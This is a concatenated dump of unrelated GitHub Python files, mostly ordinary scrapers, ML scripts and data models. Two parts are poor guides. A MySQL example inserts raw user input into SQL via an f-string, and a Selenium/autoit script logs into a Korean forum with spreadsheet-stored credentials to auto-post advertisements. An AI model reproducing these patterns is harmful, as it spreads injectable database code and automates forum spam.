Time\", \"Lent\", \"Christmas\", \"Advent\", \"Easter\"]\n        \n        day_title = response.xpath(day_title_sel).get()\n        \n        day_liturgical_title = response.xpath(day_liturgical_title_sel).get()\n        \n        unsplit_season = response.xpath(season_sel).get()\n        \n        season = unsplit_season.split(day_type_season_delimiter)[1]\n        season = season.split(type_text_delimiter)[1]\n        \n        day_type = unsplit_season.split(day_type_season_delimiter)[0]\n        day_type = day_type.split(type_text_delimiter)[1]\n        \n        \n        print(day_title)\n        print(day_liturgical_title)\n        print(season + \" [\"+season_en[season_it.index(season)]+\"]\")\n        print(day_type + \" [\"+day_types_en[day_types_it.index(day_type)]+\"]\")\n        \n        yield from self.parse_hour(0)\n        \n        yield {\"Day Title\": day_title}\n        \n    ","repo_name":"ailgup/briefer_breviary","sub_path":"breviary/breviary/spiders/ibrev.py","file_name":"ibrev.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"44025029891","text":"\"\"\"\nMessage representations received from the panel through the `AlarmDecoder`_ (AD2)\ndevices.\n\n:py:class:`AUIMessage`: Message destined for an AUI keypad.\n\n.. _AlarmDecoder: http://www.alarmdecoder.com\n\n.. moduleauthor:: Scott Petersen \n\"\"\"\n\nfrom . 
import BaseMessage\nfrom ..util import InvalidMessageError\n\nclass AUIMessage(BaseMessage):\n    \"\"\"\n    Represents a message destined for an AUI keypad.\n    \"\"\"\n\n    value = None\n    \"\"\"Raw value of the AUI message\"\"\"\n\n    def __init__(self, data=None):\n        \"\"\"\n        Constructor\n\n        :param data: message data to parse\n        :type data: string\n        \"\"\"\n        BaseMessage.__init__(self, data)\n\n        if data is not None:\n            self._parse_message(data)\n\n    def _parse_message(self, data):\n        header, value = data.split(':')\n\n        self.value = value\n\n    def dict(self, **kwargs):\n        \"\"\"\n        Dictionary representation.\n        \"\"\"\n        return dict(\n            value = self.value,\n            **kwargs\n        )","repo_name":"nutechsoftware/alarmdecoder","sub_path":"alarmdecoder/messages/aui_message.py","file_name":"aui_message.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"21"}
+{"seq_id":"1078962172","text":"from PIL import Image, ExifTags\nfrom pathlib import Path\nimport itertools\nimport datetime\nimport torch\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.nn import functional as F\nimport copy\nfrom model.model import NIMA\nfrom collections.abc import Iterable\nimport argparse\nimport pandas as pd\n\n\nclass TypedNamespace(argparse.Namespace):\n    image_path: str\n    model_path: str\n    predictions: str\n    score_only: bool\n    similarity_threshold: float\n    time_threshold: int\n\n\ndef get_parser():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--image_path', type=str, required=True, help='path to file or folder containing images')\n    parser.add_argument('--model_path', type=str, default=\"model_weights/filtered_v2_epoch-40.pth\",\n                        help='path to pretrained model')\n    parser.add_argument('--prediction_path', type=str, default=\"predictions\",\n                        help='output directory to store predictions')\n    parser.add_argument('--score_only', action='store_true',\n                        help='Whether to skip the culling step, and instead only score the images')\n    parser.add_argument('--similarity_threshold', type=float, default=0.3,\n                        help='Threshold for how similar two items need to be in order to group them ')\n    parser.add_argument(\"--time_threshold\", type=int, default=10,\n                        help='In order to group two photos, the number of minutes between them must be less than this '\n                             'number')\n    return parser\n\n\ndef score_paths(model: NIMA, image_paths: Iterable[Path]) -> dict[Path, float]:\n    \"\"\"\n    Takes a collection of paths and computes the predicted aesthetic score for each one.\n\n    Args:\n        model: A model which computes quality scores for images\n        image_paths: A collection of paths to images\n\n    Returns: A dictionary mapping each image path to its predicted mean score\n\n    \"\"\"\n\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    test_transform = transforms.Compose([\n        transforms.Resize((224, 224)),\n        transforms.ToTensor(),\n        transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                             std=[0.229, 0.224, 0.225])\n    ])\n    scores = []\n    for i, img in enumerate(image_paths):\n        mean, std = 0.0, 0.0\n        im = Image.open(img)\n        im = im.convert('RGB')\n        imt = test_transform(im)\n        imt = imt.unsqueeze(dim=0)\n        imt = imt.to(device)\n        with torch.no_grad(), torch.autocast(device_type=\"cuda\" if torch.cuda.is_available() else \"cpu\"):\n            out = model(imt)\n        out = out.view(10, 1)\n        
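# NIMA predicts a 10-bucket score distribution; reduce it to a mean and a standard deviation.\n        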
for j, e in enumerate(out, 1):\n            mean += j * e\n        for k, e in enumerate(out, 1):\n            std += e * (k - mean) ** 2\n        std = std ** 0.5\n\n        mean, std = float(mean), float(std)\n        scores.append((img, mean))\n\n    return dict(scores)\n\n\ndef extract_features(image_paths: Iterable[Path]) -> list[tuple[Path, datetime.datetime, torch.tensor]]:\n    \"\"\"\n    Takes paths, and extracts the time it was taken via metadata and also computes the features using the base model\n\n    Args:\n        image_paths: the paths to the desired images to look at\n\n    Returns: A list of triples of the (original) paths, datetime taken, and base model features\n\n    \"\"\"\n    feature_model = models.vgg16(weights='VGG16_Weights.IMAGENET1K_V1')\n\n    seed = 42\n    torch.manual_seed(seed)\n\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    model = feature_model.to(device)\n\n    model.eval()\n\n    test_transform = transforms.Compose([\n        transforms.Resize((224, 224)),\n        transforms.ToTensor(),\n        transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                             std=[0.229, 0.224, 0.225])\n    ])\n\n    # Grab metadata and compute VGG features\n    data = []\n    for image_path in image_paths:\n        img = Image.open(image_path)\n        exif = {ExifTags.TAGS[k]: v for k, v in img.getexif().items() if k in ExifTags.TAGS}\n        if \"DateTime\" in exif:\n            picture_time = datetime.datetime.strptime(exif[\"DateTime\"], \"%Y:%m:%d %H:%M:%S\")\n        else:\n            picture_time = datetime.datetime(1, 1, 1)\n        im = img.convert('RGB')\n        imt = test_transform(im)\n        imt = imt.unsqueeze(dim=0)\n        imt = imt.to(device)\n        features = model.features(imt)\n\n        data.append((image_path, picture_time, features))\n    return data\n\n\ndef group_by_features(data: Iterable[tuple[Path, datetime.datetime, torch.tensor]], time_threshold, similarity_threshold) -> set[frozenset[Path]]:\n    \"\"\"\n    Determine pairs of items that are similar in time and VGG features\n\n    Args:\n        data: triples of path, datetime, and (base) model features\n        time_threshold: maximum gap in minutes for two photos to be grouped\n        similarity_threshold: minimum cosine similarity between the VGG features\n\n    Returns: Set of groups of images that are similar in time and features\n\n    \"\"\"\n    similar_images = []\n    all_connected_images = set()\n    for (image_path1, datetime1, features1), (image_path2, datetime2, features2) in itertools.combinations(data, 2):\n        if abs(datetime1 - datetime2) <= datetime.timedelta(minutes=time_threshold) and F.cosine_similarity(\n                features1.view(1, -1), features2.view(1, -1)).cpu().data >= similarity_threshold:\n            similar_images.append([image_path1, image_path2])\n            all_connected_images |= {image_path1, image_path2}\n\n    # Turning pairs of similar items into full groups: 
repeatedly union each image's\n    # neighbour set until nothing changes, i.e. the connected components of the similarity graph.\n    graph = {img: {img_pair[0] if img_pair[1] == img else img_pair[1] for img_pair in similar_images if img in img_pair}\n             for img in all_connected_images}\n    old_graph = {}\n    while graph != old_graph:\n        old_graph = copy.deepcopy(graph)\n        graph = {img: set.union(*[graph[img2] for img2 in connected_imgs]) for img, connected_imgs in graph.items()}\n\n    # Each connected component becomes one group of near-duplicate images.\n    groups = {frozenset(connected_imgs) for connected_imgs in graph.values()}\n    return groups\n\n\ndef get_evaluation_model(weight_path: Path | str) -> NIMA:\n    \"\"\"\n    Sets up the model used to evaluate photo quality\n\n    :param weight_path: path to the file containing the weights for the pretrained model\n    :return: the NIMA model with loaded weights\n    \"\"\"\n    base_model = models.vgg16(weights='VGG16_Weights.IMAGENET1K_V1')\n    model = NIMA(base_model)\n\n    try:\n        model.load_state_dict(torch.load(weight_path))\n        print('successfully loaded evaluation model')\n    except Exception:\n        raise RuntimeError(\"Could not load state dictionary, are you sure your path is correct?\")\n\n    seed = 42\n    torch.manual_seed(seed)\n\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    model = model.to(device)\n\n    model.eval()\n\n    return model\n\n\ndef extract_top_scored(group: Iterable[Path], scores: dict[Path, float]) -> Path:\n    return max(group, key=lambda path: scores[path])\n\n\ndef main():\n    parser = get_parser()\n    args = parser.parse_args(namespace=TypedNamespace())\n    print(args)\n\n    image_dir = Path(args.image_path)\n    image_paths = list(itertools.chain(image_dir.glob(\"*.jpg\"),\n                                       image_dir.glob(\"*.jpeg\"),\n                                       image_dir.glob(\"*.png\")))\n\n    model = get_evaluation_model(weight_path=args.model_path)\n    scores = score_paths(model, image_paths)\n    prediction_path = Path(args.prediction_path)\n\n    if not prediction_path.exists():\n        prediction_path.mkdir(parents=True)\n    pd.DataFrame(scores.items(), columns=[\"path\", \"score\"]).to_csv(prediction_path / \"scores.csv\", index=False)\n    print(f\"Image scores saved to {prediction_path / 'scores.csv'}\")\n\n    if not args.score_only:\n        path_date_features = extract_features(image_paths)\n        print(\"Image features extracted, now grouping images\")\n        groups = group_by_features(path_date_features,\n                                   time_threshold=args.time_threshold, similarity_threshold=args.similarity_threshold)\n        print(\"Images successfully grouped\")\n        culled_unflattened = [group - {extract_top_scored(group, scores)} for group in groups]\n        culled_images = frozenset.union(*culled_unflattened)\n        # We've restricted to groups of images, so we need to put back in the ungrouped images\n        kept_images = set(image_paths) - culled_images\n\n        with open(prediction_path / \"kept_images.txt\", \"w\") as f:\n            f.write(\"\\n\".join([kept_image.name for kept_image in kept_images]))\n        print(f\"Kept image list saved to {prediction_path / 'kept_images.txt'}\")\n\n        with open(prediction_path / \"culled_images.txt\", \"w\") as f:\n            f.write(\"\\n\".join([culled_image.name for culled_image in culled_images]))\n        print(f\"Culled image list saved to {prediction_path / 'culled_images.txt'}\")\n\n\n    return 0\n\n\nif __name__ == '__main__':\n    raise SystemExit(main())\n","repo_name":"adelynflowers/photoCulling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
+{"seq_id":"33898508753","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.label_format 
import LabelFormat\nfrom ..models.standard_id_for_label import StandardIdForLabel\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.file_contents import FileContents\n from ..models.label_dimensions import LabelDimensions\n\n\nT = TypeVar(\"T\", bound=\"Label\")\n\n\n@attr.s(auto_attribs=True)\nclass Label:\n r\"\"\"Data for creating a shipping label and dimensions for printing the label.\n\n Attributes:\n dimensions (LabelDimensions): Dimensions for printing a shipping label.\n file_contents (FileContents): The document data and checksum.\n custom_text_for_label (Union[Unset, str]): Custom text to print on the label.\n\n Note: Custom text is only included on labels that are in ZPL format (ZPL203). FedEx does not support\n CustomTextForLabel.\n label_format (Union[Unset, LabelFormat]): The label format.\n standard_id_for_label (Union[Unset, StandardIdForLabel]): The type of standard identifier to print on the label.\n \"\"\"\n\n dimensions: \"LabelDimensions\"\n file_contents: \"FileContents\"\n custom_text_for_label: Union[Unset, str] = UNSET\n label_format: Union[Unset, LabelFormat] = UNSET\n standard_id_for_label: Union[Unset, StandardIdForLabel] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n dimensions = self.dimensions.to_dict()\n\n file_contents = self.file_contents.to_dict()\n\n custom_text_for_label = self.custom_text_for_label\n label_format: Union[Unset, str] = UNSET\n if not isinstance(self.label_format, Unset):\n label_format = self.label_format.value\n\n standard_id_for_label: Union[Unset, str] = UNSET\n if not isinstance(self.standard_id_for_label, Unset):\n standard_id_for_label = self.standard_id_for_label.value\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"Dimensions\": dimensions,\n \"FileContents\": file_contents,\n }\n )\n if custom_text_for_label is not UNSET:\n field_dict[\"CustomTextForLabel\"] = custom_text_for_label\n if label_format is not UNSET:\n field_dict[\"LabelFormat\"] = label_format\n if standard_id_for_label is not UNSET:\n field_dict[\"StandardIdForLabel\"] = standard_id_for_label\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.file_contents import FileContents\n from ..models.label_dimensions import LabelDimensions\n\n d = src_dict.copy()\n dimensions = LabelDimensions.from_dict(d.pop(\"Dimensions\"))\n\n file_contents = FileContents.from_dict(d.pop(\"FileContents\"))\n\n custom_text_for_label = d.pop(\"CustomTextForLabel\", UNSET)\n\n _label_format = d.pop(\"LabelFormat\", UNSET)\n label_format: Union[Unset, LabelFormat]\n if isinstance(_label_format, Unset):\n label_format = UNSET\n else:\n label_format = LabelFormat(_label_format)\n\n _standard_id_for_label = d.pop(\"StandardIdForLabel\", UNSET)\n standard_id_for_label: Union[Unset, StandardIdForLabel]\n if isinstance(_standard_id_for_label, Unset):\n standard_id_for_label = UNSET\n else:\n standard_id_for_label = StandardIdForLabel(_standard_id_for_label)\n\n result = cls(\n dimensions=dimensions,\n file_contents=file_contents,\n custom_text_for_label=custom_text_for_label,\n label_format=label_format,\n standard_id_for_label=standard_id_for_label,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return 
self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/merchant_fulfillment_v0/models/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72324624693","text":"\nimport mysql.connector\n\nmy_db = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"#####\",\n database=\"testdb\"\n)\n\nmy_cursor = my_db.cursor()\n\ndef insert_concert_from_user_input():\n datum = input('Datum: ')\n land = input('Land: ')\n stadt = input('Stadt: ')\n\n val = f'\"{datum}\", \"{land}\", \"{stadt}\"'\n sql = f'INSERT INTO konzerte VALUE ({val})'\n\n my_cursor.execute(sql)\n my_db.commit()\n\ndef show_all_data():\n my_cursor.execute(\"SELECT * FROM konzerte\")\n result = my_cursor.fetchall()\n\n for _ in result:\n print(_)\n\n\ninsert_concert_from_user_input()\n\nshow_all_data()\n","repo_name":"HaudegenHH/Python-Projects","sub_path":"mysql_example.py","file_name":"mysql_example.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6290853225","text":"#Krishna Narayan\n#2327205\n#narayan@chapman.edu\n#CPSC 230 section 08\n#Assignment 1\n\n#calculating total hours, minutes and seconds based on total amount of seconds\ndef seconds():\n #takes input\n total_seconds = int(input(\"input total amount of seconds \"))\n #divides out hours\n exact_hours = total_seconds / 3600\n #defines remaining seconds\n remaining_seconds = total_seconds % 3600\n #divides out minutes\n exact_minutes = remaining_seconds / 60\n #takes remainder as final remaining seconds\n exact_seconds_final = (remaining_seconds % 60)\n #prints with rounding for readability.\n return str(int(exact_hours)) + \" hours, \" + str(int(exact_minutes)) + \" minutes, \" + str(int(exact_seconds_final)) + \" seconds \"\n\nprint(seconds())\n","repo_name":"narayan-krishna/fall2019cpsc230","sub_path":"Assignment1/Seconds.py","file_name":"Seconds.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39950841972","text":"import sys\nimport numpy as np\n\nin_file = sys.argv[1] if len(sys.argv) > 1 else \"input\"\ndata = open(in_file, 'r').read().splitlines()\n \nnb = [[x for x in l] for l in data]\nnb = np.array(nb)\n\ns = 0\nfor c in range(len(nb)):\n for r in range(len(nb[c])):\n v = False\n v |= all(nb[c, r] > nb[:c, r])\n v |= all(nb[c, r] > nb[c+1:, r])\n v |= all(nb[c, r] > nb[c, :r])\n v |= all(nb[c, r] > nb[c, r+1:])\n s += int(v)\nprint(s)\n\nm = 0\nfor c in range(1, len(nb)):\n for r in range(1, len(nb[c])):\n d = 1\n d *= c - next((c2 for c2 in range(c-1, -1, -1) if nb[c2, r] >= nb[c, r]), 0)\n d *= next((c2 for c2 in range(c+1, len(nb)) if nb[c2, r] >= nb[c, r]), len(nb)-1) - c\n d *= r - next((r2 for r2 in range(r-1, -1, -1) if nb[c, r2] >= nb[c, r]), 0)\n d *= next((r2 for r2 in range(r+1, len(nb[c])) if nb[c, r2] >= nb[c, r]), len(nb[c])-1) - r\n m = max(m, 
d)\nprint(m)","repo_name":"theevann/advent-of-code","sub_path":"2022/day_8/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"72895508852","text":"from __future__ import print_function\nimport scrapy\nimport time\nimport sys\nfrom bs4 import BeautifulSoup\nfrom scrapy.selector import Selector\nfrom scrapy.http.request import Request\nfrom okezone.items import OkezoneItem\n\n\nclass OkezoneSpider(scrapy.Spider):\n    name = \"okezone\"\n    allowed_domains = [\"okezone.com\"]\n    start_urls = [\n        \"http://index.okezone.com/\",\n    ]\n\n    def parse(self, response):\n        \"\"\" This function parses the news index page.\n\n        @url http://index.okezone.com/\n        @returns items\n        \"\"\"\n\n        indeks = Selector(response).xpath('//*[@id=\"in\"]/ol/li')\n\n        for indek in indeks:\n            item = OkezoneItem()\n            news_link = indek.xpath('h4/a/@href').extract_first().strip()\n            item['title'] = indek.xpath('h4/a/text()').extract_first().strip()\n            item['link'] = news_link\n            item['category'] = indek.xpath('h6/a/text()').extract_first().strip()\n            item['date'] = time.strftime(\"%d/%m/%Y\")\n            detail_request = Request(news_link, callback=self.parse_detail)\n            detail_request.meta['item'] = item\n            yield detail_request\n\n    def parse_detail(self, response):\n        print(\"Crawling detail news\")\n        item = response.meta['item']\n        selector = Selector(response)\n        description = selector.xpath('//*[@id=\"contentx\"]').extract_first()\n        item['desc'] = BeautifulSoup(description).text.strip()\n        item['images'] = selector.xpath('//*[@id=\"imgCheck\"]/@src')\n        return item","repo_name":"harryandriyan/warta-scrap","sub_path":"okezone/okezone/spiders/okezone_spider.py","file_name":"okezone_spider.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"}
+{"seq_id":"6701742566","text":"import numpy as np\nimport os\nimport sys\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\nfrom PST import runPST\nimport argparse\nsys.path.insert(0, 'src/')\nfrom filepath_dir import Chain_dir, Uniprot_to_PDB, dataset_to_uniprot\ndef get_upper(characters):\n    characters_new=''\n    for a in characters:\n        if a.isalpha():\n            a=a.upper()\n        characters_new+=a\n    return characters_new\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('dataset',type=str)\n    parser.add_argument('a',type=int,help=\"index for the first mutation to be calculated\")\n    parser.add_argument('b',type=int,help=\"index for the last mutation to be calculated\",)\n    parser.add_argument(\"--max_mut\",type=int,help=\"max number of mutations\",default=1)\n    parser.add_argument(\"--site_method\",type=str,help=\"Method for dealing with features involving multiple mutations. \"\n                                                      \"`align` concatenates features to a vector, and uses zero padding to fill positions if the number of mutations is fewer than --max_mut. \"\n                                                      \"`sum` sums up features over all mutational sites. \"\n                                                      \"Options: 1. align 2. sum 3. avg \",default='sum')\n    parser.add_argument('--persistence',type=float,default=0.0,help=\"persistence parameter. For nonharmonic spectra in L1 and L2 only.\",)\n\n    parser.add_argument('--structure_method', type=str,default='')\n    parser.add_argument('--feature_list', type=str,default='PH0+PH12+PST0',help='A list of features. '\n                                                                                'Multiple features can be input '\n                                                                                'Separated by \"+\" sign '\n                                                                                'Available features:'\n                                                                                '1. PH0 (PH0 feature)'\n                                                                                '2. 
PH12 (PH12 features, using statistics on persistent bar'\n                                                                                '3. PST0 (PST0 features, including harmonic and non-harmonic spectra)'\n                                                                                '4. PH12_landscape (PH12 features vectorized by Persistent Landscape'\n                                                                                '5. PST12 (PST12 features for betti numbers, and non-harmonic spectra)' )\n    parser.add_argument('--output_path', type=str,\n                        default='')\n    args = parser.parse_args()\n    dataset=args.dataset\n    a=args.a\n    b=args.b\n    structure_method=args.structure_method\n\n    feature_list=args.feature_list.split('+')\n    persistence=args.persistence\n    uniprot=dataset_to_uniprot.get(dataset)\n    PDBid_list = Uniprot_to_PDB.get(uniprot)\n    if structure_method in PDBid_list:\n        PDBid=PDBid_list.get(structure_method)\n    else:\n        PDBid=PDBid_list.get('default')\n    Chain = Chain_dir.get(uniprot)\n    data = pd.read_csv('data/' + dataset + '/data.csv')\n    pH = '7.0'\n    for data_id in range(a,b):\n        print(data_id)\n        MUT=data['mutant'].values[data_id].split(',')\n        mutations=[mut[0]+Chain+mut[1:] for mut in MUT]\n        y = float(data['log_fitness'].values[data_id])\n        num_sites = len(mutations)\n        if not structure_method=='':\n            data_path=args.output_path+uniprot+'_'+structure_method+'/'\n        else:\n            data_path=args.output_path+uniprot+'/'\n        os.system('mkdir -p '+data_path)\n        working_dir = data_path + '_'.join(mutations)+'/'\n        if persistence==0.0:\n            target_npy=working_dir+'X_PST12mute.npy'\n        else:\n            target_npy=working_dir+'X_PST12mute'+'_p='+str(persistence)+'.npy'\n        if not os.path.exists(target_npy):\n            # os.system('rm -r '+working_dir)\n            os.system('mkdir -p ' + working_dir)\n            print('running on >>>>>>>>>'+ working_dir)\n            print(PDBid)\n            if structure_method=='NMR':\n                MODEL_ID=[]\n                for i in range(100):\n                    pdbfile='structure_data/'+uniprot+'/processed_PDB/'+PDBid+'_m'+str(i)+'.pdb'\n                    if os.path.exists(pdbfile):\n                        os.system('cp '+pdbfile+' '+working_dir+PDBid+'_m'+str(i)+'_WT.pdb')\n                        MODEL_ID.append(i)\n                home_dir=os.getcwd()\n                os.chdir(working_dir)\n                runPST.main_NMR(feature_list,PDBid, Chain, mutations, num_sites, pH, ['WT','MT'],\n                                max_mut=args.max_mut,site_method=args.site_method,MODEL_ID=MODEL_ID)\n            else:\n                os.system('cp structure_data/'+uniprot+'/processed_PDB/'+PDBid+'.pdb '+working_dir+PDBid+'_WT.pdb')\n                home_dir=os.getcwd()\n                os.chdir(working_dir)\n                runPST.main(feature_list,PDBid, Chain, mutations, num_sites, pH, ['WT','MT'],\n                            max_mut=args.max_mut,site_method=args.site_method)\n            # os.system('rm *.pdb')\n\n            os.chdir(home_dir)\n\n\n\n","repo_name":"YuchiQiu/TopFit","sub_path":"src/PST_embedding.py","file_name":"PST_embedding.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"4037814049","text":"#!/usr/bin/python3\n\"\"\" function that prints a text with\n    2 new lines after each of these characters: ., ? and :\"\"\"\n\n\ndef text_indentation(text):\n    \"\"\" Insert a blank line after each of '.', '?' or ':' in the printed text.
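\n\n    Example: text_indentation(\"Hi. Bye\") prints \"Hi.\", then a blank line, then \"Bye\".\n    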
\"\"\"\n\n characters = [\".\", \"?\", \":\"]\n skip_next = False\n if type(text) != str:\n raise TypeError('text must be a string')\n for letter in text:\n if letter in characters:\n print(letter)\n print()\n skip_next = True\n else:\n if skip_next is False:\n print(letter, end=\"\")\n else:\n if letter != \" \":\n print(letter, end=\"\")\n skip_next = False\n","repo_name":"noemiepham/holbertonschool-higher_level_programming","sub_path":"python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14020406827","text":"from selenium import webdriver\nimport time\nimport pyautogui\nimport pyperclip\nfrom selenium.webdriver.common.by import By\nimport chromedriver_autoinstaller\nimport openpyxl\nfrom selenium.webdriver.support.select import Select\nimport pandas as pd\nimport datetime\nimport autoit\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"--no-sandbox\")\nchrome_options.add_argument('--disable-dev-shm-usage')\n\nsave_path = \"정보.xlsx\"\nsave_path2 = \"소스만.xlsx\"\n# 기존 파일 불러오기\nwb = openpyxl.load_workbook(save_path, data_only=True)\nwa = openpyxl.load_workbook(save_path2, data_only=True)\nsh = pd.read_excel(\"정보.xlsx\")\n#시트선택\nws = wb.active\nws2 = wa.active\nchromedriver_autoinstaller.install()\n\ndef upload(a, wb=wb,wa=wa):\n url = \"https://www.ppomppu.co.kr/zboard/login.php?r_url=http%3A%2F%2Fwww.ppomppu.co.kr%2Fzboard%2Fzboard.php%3Fid%3Dpmarket3\"\n browser=webdriver.Chrome()\n browser.implicitly_wait(100) # 로딩을 기다릴것 최대 100초\n browser.maximize_window() # 화면 최대화할것\n browser.get(url)\n # 로그인\n id = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/li[1]/input[1]\")\n id.click()\n id.click()\n id.send_keys(ws.cell(row=a,column=1).value)\n\n # 패스워드\n\n pw = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/li[1]/input[2]\")\n pw.click()\n pw.click()\n pw.send_keys(ws.cell(row=a,column=2).value)\n\n # 로그인 버튼 누르기\n log_btn = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/a\")\n log_btn.click()\n time.sleep(2.5)\n\n # 글쓰기\n write_add = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div[1]/table[4]/tbody/tr[2]/td[2]/nobr[2]/a/font\")\n write_add.click()\n time.sleep(2.5)\n\n # 제목\n title = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[3]/td/input\")\n title.send_keys(ws.cell(row=a,column=3).value)\n time.sleep(2.5)\n\n #링크\n link = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[4]/td/input\")\n link.send_keys(ws.cell(row=a,column=4).value)\n time.sleep(2.5)\n\n # 내용\n edit = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[6]/td/div[3]/div[6]/div[2]\")\n edit.click()\n pyperclip.copy(ws2.cell(row=2,column=1).value)\n pyautogui.hotkey(\"ctrl\", \"v\")\n time.sleep(1)\n edit = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[6]/td/div[3]/div[6]/div[1]\")\n edit.click()\n time.sleep(2.5)\n\n #분류\n select_element = browser.find_element(by=By.XPATH,value='/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[2]/td/span/select')\n select_object = Select(select_element)\n 
select_object.select_by_visible_text('인터넷')\n\n    # Upload the image\n    ssumnail = browser.find_element(by=By.XPATH,value='/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[3]/tbody/tr[5]/td/div[2]/span')\n    ssumnail.click()\n    time.sleep(5)\n\n    # Store the Basic Window info value in the handle variable\n    handle = \"[CLASS:#32770; TITLE:열기]\"\n\n    # Wait up to 3 seconds for the window titled '열기' (Open) to appear\n    autoit.win_wait_active(\"열기\", 3)\n\n    img_path = '\"C:\\\\Users\\\\remon\\\\OneDrive\\\\바탕 화면\\\\제품사진.jpg\"'\n\n    # In the file dialog, send the image path to the File name (N) field\n    autoit.control_send(handle, \"Edit1\", img_path)\n    time.sleep(1)\n\n    # Click Button1 in the same file dialog\n    autoit.control_click(handle, \"Button1\")\n    time.sleep(1)\n\n    # Event -> handle the case where the files arrive already merged\n\n    # Quit\n    #browser.close()\n","repo_name":"remontree/advertisement_automation","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33554484733","text":"__author__ = 'Pavlov_Egor'\nimport random\n\n\ndef get_jokes(list_1, list_2, list_3, flag1=False):\n    \"\"\"\n    Returns a list of jokes consisting of the elements of the lists.\n    The number of jokes equals the length of the shortest list.\n    :param list_1: first word list\n    :param list_2: second word list\n    :param list_3: third word list\n    :param flag1: By default, words are repeated.\n    :return: list\n    \"\"\"\n\n    if flag1:\n        for el in range(min(len(list_1), len(list_2), len(list_3))):  # the number of jokes follows the shortest list\n            pop_el_1 = list_1.pop(list_1.index(random.choice(list_1)))  # pick a random element, find its index and pop it\n            pop_el_2 = list_2.pop(list_2.index(random.choice(list_2)))\n            pop_el_3 = list_3.pop(list_3.index(random.choice(list_3)))\n            list_of_jokes.append([pop_el_1, pop_el_2, pop_el_3])\n    else:\n        for el_1, el_2, el_3 in zip(list_1, list_2, list_3):  # is there a way without el_*?\n            list_of_jokes.append([random.choice(list_1), random.choice(list_2), random.choice(list_3)])\n    return list_of_jokes\n\n\nnouns = ['автомобиль', 'лес', 'огонь', 'город', 'дом', 'мяч']\nadverbs = ['сегодня', 'вчера', 'завтра', 'позавчера', 'ночью', 'в среду']\nadjectives = ['веселый', 'яркий', 'зеленый', 'утопичный', 'мягкий', 'огромный']\n\nlist_of_jokes = []\n
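# NOTE: bool(input(...)) is True for ANY non-empty reply, so typing 'no' still counts as True.\n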
